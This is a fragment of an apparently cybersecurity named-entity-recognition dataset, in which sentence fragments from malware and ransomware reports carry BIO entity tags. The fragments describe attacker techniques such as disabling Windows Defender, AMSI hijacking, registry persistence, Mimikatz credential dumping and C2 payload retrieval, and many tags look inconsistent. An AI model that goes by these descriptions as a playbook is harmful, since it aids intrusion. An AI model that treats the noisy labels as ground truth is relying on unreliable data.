"ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "usernames/passwords," ], "ner_tags": [ "O" ] }, { "tokens": [ "include", "saved", "credentials" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "run", "under", "the", "name", "“tmp.exe”", "by", "unpacking", "itself", "to", "the", "“C:\\Users\\admin\\AppData\\Local\\Temp\\”", "file", "path." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Registry", "Key", "Sets" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "transmits", "information", "as", "a", "zip", "file" ], "ner_tags": [ "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "this", "information", "to", "its", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C2", "is", "transmitted", "as", "a", "zip", "file", "during", "the", "POST", "request." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "transferred", "to", "the", "C2", "server", "as", "a", "zip", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "transfers", "them", "to", "the", "C2", "address" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "many", "obfuscated", "strings", "that", "are", "being", "covered", "by", "a", "random", "string,", "“edx765“,", "to", "evade", "detection." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "information," ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "passes", "the", "obfuscated", "string", "to", "a", "function", "that", "strips", "the", "arbitrary", "string", "and", "delivers", "the", "original", "string" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "passes", "the", "obfuscated", "string", "to", "a", "function", "that", "strips", "the", "arbitrary", "string", "and", "delivers", "the", "original", "string." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Making", "a", "‘POST’", "request," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "multiple", "POST", "requests", "to", "the", "“c2/sock”", "address" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "accessed", "C2", "while", "visiting", "port", "80" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "are", "instructed", "to", "click", "“Confirm”", "to", "view", "a", "message", "from", "“Express.”" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "user", "is", "also", "asked", "to", "permit", "push", "notifications", "in", "the", "browser," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "decrypted,", "the", "configuration", "file", "reveals", "several", "parameters," ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Decryption", "exclusion", "list" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypted", "using", "the", "RC4", "algorithm", "with", "a", "hard-coded", "key", "in", "the", "resource." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "send", "the", "decryption", "program" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "and", "decrypted" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypted", "using", "the", "RC4", "algorithm", "with", "a", "hardcoded", "key", "in", "the", "resource." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "hardcoded", "key", "to", "decrypt", "the", "configuration", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "to", "decrypt", "the", "configuration", "file." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Get", "configuration", "file", "and", "decrypt", "it" ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Decryptor", "download" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "decryptor", "is", "delivered", "in", "a", "zip", "archive", "containing", "the", "decryptor", "executable" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decryptor", "to", "clean", "up", "their", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "At", "the", "end", "of", "the", "decryption", "process,", "the", "program", "indicates", "the", "number", "of", "decrypted", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decryptor", "has", "finished", "the", "decryption", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decryptor", "execution" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "decryptor", "program", "appears", "unique", "and", "is", "linked", "to", "one", "victim", "specifically.", "In", "our", "example,", "it", "only", "decrypts", "the", "files" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "one", "to", "get", "information", "about", "the", "machine,", "such", "as", "the", "operating", "system", "version," ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "one", "to", "get", "processes" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "reflective", "DLL", "loading,", "to", "inject", "a", "DLL", "from", "memory." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Use", "Windows", "API", "functions", "to", "inject", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "a", "regular", "Bitmap", "(open", "matrix", "image", "format", "used", "by", "Windows)", "that", "can", "be", "used", "by", "malware", "to", "execute", "code", "or", "as", "a", "payload", "dropper" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "The", "image’s", "pixels", "are", "an", "actual", "binary", "representation", "of", "the", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "process", "can", "be", "summarized", "as", "Exe", "->", "Resources", "->", "BMP", "with", "embedded", "data", "in", "pixels", "fetched" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "unpacked", "malware" ], "ner_tags": [ "O", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "configuration", "file", "encrypted." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "Script", "uses", "Base64", "and", "hexadecimal", "encoding", "and", "XOR-encryption" ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ ".", "The", "malware", "will", "try", "first", "to", "write", "in", "the", "registry-hive", "“HKEY_LOCAL_MACHINE”", "but", "if", "it", "cannot", "create", "it,", "it", "will", "use", "the", "registry-hive", "“HKEY_CURRENT_USER”:" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Write", "in", "the", "registry" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "After", "the", "writing", "in", "the", "registry", "has", "been", "completed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "write", "in", "the", "registry", "information" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Create", "its", "own", "registry", "key", "in", "\\SOFTWARE\\<uniquename>" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "using", "the", "functions", "“SHGetFolderPathlW”", "and", "“CreateFileW”" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "with", "the", "function", "“WriteFile”." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Use", "Windows", "API", "functions" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch", "script", "will", "delete", "the", "malware", "sample", "with", "its", "path", "using", "the", "command", "“del”", "and", "finally", "delete", "the", "bat", "file", "with", "the", "command", "“del", "%0%”." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "uses", "the", "“del”", "command" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "tries", "to", "remove", "itself", "from", "the", "machine", "to", "avoid", "being", "detected", "and", "analyzed", "by", "security", "researchers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deletes", "the", "ransom", "note" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "download", "is", "done", "directly", "from", "the", "NetWalker", "Tor", "site" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "will", "be", "able", "to", "download", "the", "decryptor" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Place", "a", "value", "on", "RunOnce", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "performing", "password", "spray," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Activity", "from", "a", "password-spray", "associated", "IP", "address." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "IP", "address", "that", "had", "been", "identified", "as", "participating", "in", "password", "spray" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "credential", "stuffing", "attacks" ], "ner_tags": [ "B-Org", "I-OffAct", "I-OffAct" ] }, { "tokens": [ "is", "distributed", "through", "exposed", "Remote", "Desktop", "Protocol", "(RDP)", "setups" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O" ] }, { "tokens": [ "a", "heavy", "emphasis", "on", "Remote", "Desktop", "Protocols." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "by", "brute-forcing", "them" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "using", "other", "known", "vulnerabilities", "for", "initial", "access,", "i.e.", "vulnerabilities", "in", "Citrix", "gateway", "devices" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "uses", "other", "tools", "to", "gather", "credentials", "that", "include", "Mimikatz,", "LaZagne,", "and", "NirSoft’s", "NetPass." ], "ner_tags": [ "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Way", "B-Way", "O", "B-Way", "B-Way" ] }, { "tokens": [ "It", "uses", "bat", "files" ], "ner_tags": [ "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "A", "batch", "file", "to", "stop", "services" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "stolen", "credentials", "are", "used", "to", "reach", "high-value", "machines", "like", "servers" ], "ner_tags": [ "O", "B-Way", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "WMIC", "/node" ], "ner_tags": [ "B-SamFile", "B-SamFile" ] }, { "tokens": [ "reg", "add", "HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "makes", "use", "of", "API", "GetTickCount", "/", "QueryPerformanceCounter" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Way", "B-Way" ] }, { "tokens": [ "the", "help", "of", "ShellExecute", "API" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "delete", "itself", "from", "the", "target", "systems", "after", "infection" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "also", "drops", "and", "installs" ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "sets", "the", "following", "registry", "entry", "to", "open", "the", "downloaded", "PDF", "file", "every", "time", "the", "computer", "boots" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iXqrVo" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "adding", "the", "HIDDEN", "file", "attribute" ], "ner_tags": [ "O", "O", "B-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "adds", "the", "HIDDEN", "file", "attribute", "to", "the", "file:" ], "ner_tags": [ "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "taking", "command", "line", "arguments" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "command", "line", "argument" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "to", "download", "and", "execute", "a", "remote", "“note.hta”:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "to", "download", "another", "remote", "file" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "download", "and", "execution" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "uses", "PowerShell", "to", "pull", "and", "run" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "downloading", "and", "executing" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "downloads", "and", "runs" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "downloads", "and", "executes" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "downloads", "and", "executes" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "downloads", "and", "executes" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "downloads", "and", "executes" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "downloads", "and", "executes" ], "ner_tags": [ "B-Features", "O", "O" ] }, { "tokens": [ "the", "download", "of", "wed.hta" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "disables", "AMSI", "by", "hijacking", "the", "COM", "server,", "changing", "it", "from", "\"%windir%\\system32\\amsi.dll\"", "to", "\"C:\\IDontExist.dll\"." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "performs", "the", "following", "actions", "to", "alter", "Windows", "Defender", "settings" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adds", "the", "following", "exclusions", "to", "Windows", "DefenderExtensions" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-SecTeam", "B-SecTeam" ] }, { "tokens": [ "Allows", "known", "Windows", "Defender", "Threat", "IDs", "to", "execute" ], "ner_tags": [ "O", "O", "O", "I-SecTeam", "I-SecTeam", "I-SecTeam", "O", "O" ] }, { "tokens": [ "Disables", "Windows", "Defender", "Attack", "Surface", "Reduction", "(ASR)", "rules" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disables", "the", "following", "Windows", "Defender", "features:Intrusion", "Prevention", "System", "IO", "AV", "Protection", "(does", "not", "scan", "downloaded", "files", "and", "attachments)", "Realtime", "monitoring", "Script", "scanning", "Controlled", "folder", "access", "protection", "PUA", "protection", "Scheduled", "scan" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sets", "Network", "Protection", "to", "audit", "mode", "in", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disables", "MAPS", "(Microsoft", "Active", "Protection", "Service)", "reporting" ], "ner_tags": [ "B-Way", "B-SecTeam", "O", "I-SecTeam", "I-SecTeam", "O", "O" ] }, { "tokens": [ "Allows", "severe/high/moderate/low-level", "threats", "to", "execute" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disables", "the", "\"administrator", "in", "Admin", "Approval", "Mode\"", "user", "type", "(disables", "UAC", "prompts)" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Stops", "the", "WinDefend", "service", "(Windows", "Defender)" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "Disables", "the", "startup", "of", "the", "WinDefend", "service" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Deletes", "the", "WinDefend", "service" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Stops", "the", "Microsoft", "Defender", "Antivirus", "Network", "Inspection", "Service", "(WdNisSvc)" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "designed", "to", "hamper", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "fool", "potential", "victims", "into", "opening", "them." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "users", "still", "need", "to", "manually", "mount", "them", "and", "run", "the", "fake", "PDFs", "to", "trigger", "the", "infection", "chain" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Manually", "executing", "the", "lnk", "file", "triggers" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Manual", "interactions", "are", "required" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "a", "lot", "of", "junk", "code" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "taking", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "to", "load", "a", "binary", "into", "memory", "that", "injects" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "modify", "group", "policy", "for", "privilege", "escalation", "and", "defense", "evasion" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Purp", "O", "B-Idus", "B-Purp" ] }, { "tokens": [ "can", "modify", "group", "policy", "for", "privilege", "escalation", "and", "defense", "evasion." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "B-Purp", "O", "B-Idus", "B-Purp" ] }, { "tokens": [ "Attempts", "to", "delete", "malicious", "batch", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "makes", "modifications", "to", "the", "Registry." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "adds", "a", "custom", "icon", "to", "the", "registry," ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "modifies", "the", "registry" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "creating", "a", "registry", "key", "HKCU\\Control", "Panel\\Desktop" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disables", "Windows", "Defender", "with", "batch", "scripts" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "with", "batch", "scripts" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Uses", "batch", "scripts" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "command", "line", "argument" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "uses", "Mimikatz", "to", "dump", "passwords." ], "ner_tags": [ "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Uses", "GetComputerName", "to", "query", "the", "computer", "name." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "used", "RDP", "for", "lateral", "movement." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "has", "installed", "and", "used", "legitimate", "tools", "such", "as", "TeamViewer", "and", "AnyConnect", "on", "targeted", "systems." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "iterate", "through", "the", "entire", "file", "system," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Victims", "receive", "spear", "phishing", "emails", "with", "attached", "malicious", "zip", "files" ], "ner_tags": [ "O", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encoded", "PowerShell", "scripts" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "scripts", "to", "download", "additional", "scripts." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creates", "benign-looking", "services", "for", "the", "ransomware", "binary." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creates", "benign-looking", "services", "for", "the", "ransomware", "binary." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lists", "internal", "IP", "addresses" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "has", "installed", "and", "used", "PsExec", "to", "execute", "payloads", "on", "remote", "hosts." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malicious", "actors", "typically", "gain", "entry", "to", "organizations’", "Microsoft", "365", "environments", "by", "abusing", "either", "stolen", "account", "credentials" ], "ner_tags": [ "O", "B-HackOrg", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "malicious", "actors", "behaving", "in", "predictable", "ways", "once", "they", "gain", "access", "to", "customer", "Microsoft", "365", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Actor", "signs", "in", "to", "a", "Microsoft", "365", "account", "from", "an", "endpoint" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malicious", "actor", "signing", "in", "to", "a", "Microsoft", "365", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "the", "actor", "took", "after", "logging", "in", "to", "a", "user’s", "Microsoft", "365", "account" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "malicious", "actor", "was", "observed", "signing", "in", "to", "a", "Microsoft", "365", "account" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "began", "with", "an", "actor", "signing", "into", "an", "internal", "user’s", "Microsoft", "365", "account", "from", "a", "VPN" ], "ner_tags": [ "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "spoof", "of", "the", "legitimate", "‘PerfectData’", "software", "designed", "to", "masquerade", "a", "malicious", "application", "as", "legitimate" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "brute-force", "activity" ], "ner_tags": [ "B-Org", "B-OffAct" ] }, { "tokens": [ "The", "emails", "included", "an", "attachment", "named", "‘Credit", "Transfer", "Copy.html’" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "capable", "of", "modifying", "Windows", "UAC", "prompt,", "disabling", "Windows", "Defender", "notifications,", "disabling", "Task", "Manager,", "disabling", "command", "prompt,", "preventing", "users", "from", "accessing", "Windows", "registry", "tools,", "disabling", "the", "Run", "command,", "and", "modifying", "the", "display", "timeout" ], "ner_tags": [ "O", "O", "B-Features", "I-Features", "B-HackOrg", "O", "B-Features", "O", "O", "B-HackOrg", "B-Features", "I-Features", "O", "B-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "B-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "performing", "antivirus", "tampering" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "script", "retrieves", "NSudo", "and", "modifies", "Windows", "UAC", "prompt", "behavior", "by", "allowing", "administrators", "to", "perform", "operations", "without", "authentication", "or", "consent", "prompts" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disabling", "Windows", "Defender", "notifications,", "Disabling", "Task", "Manager,", "Disabling", "command", "prompt,", "Preventing", "users", "from", "accessing", "Windows", "registry", "tools,", "Disabling", "Run", "command,", "Modifying", "the", "display", "timeout" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "threat", "actor(s)", "made", "sure", "to", "add", "more", "paths", "and", "folders", "to", "Windows", "Defender", "exclusion", "including", "%TEMP%", "and", "C:\\Windows\\*", "as", "well", "as", "adding", ".ps1", "(PowerShell)", "extension", "to", "the", "exclusion", "list." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Disabling", "Windows", "Defender", "notifications,", "Task", "Manager", "and", "Command", "Prompt" ], "ner_tags": [ "B-SamFile", "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "recursively", "removes", "the", "implementation", "of", "Windows", "Defender", "IOfficeAntiVirus" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "then", "adds", "the", "extensions", "such", "as", "exe", "and", "DLL", "as", "exclusions", "to", "Windows", "Defender." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "performs", "the", "antivirus", "checks" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "script", "checks", "the", "host", "against", "the", "list", "of", "antiviruses" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "antivirus", "check", "script" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "to", "download", "the", "malicious", "update.bat", "file", "from", "the", "C2", "domain" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "the", "capability", "of", "sending", "additional", "payloads", "to", "the", "hosts" ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "pulling", "additional", "BatLoader", "payloads", "and", "scripts", "from", "C2" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "retrieves", "the", "same", "files", "from", "the", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executing", "scripts", "and", "commands", "retrieved", "from", "C2", "such", "as", "ps1,", "bat,", "vbs,", "and", "exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "B-Way", "O", "B-Way" ] }, { "tokens": [ "the", "script", "retrieves", "the", "Cobalt", "Strike", "payload" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "retrieves", "and", "executes", "the", "runanddelete.bat", "and", "scripttodo.ps1", "scripts", "from", "the", "C2" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "then", "the", "full", "set", "of", "malware", "is", "retrieved", "from", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "retrieving", "malware", "from", "C2" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch", "file", "was", "executed" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "batch", "file", "to", "run" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { 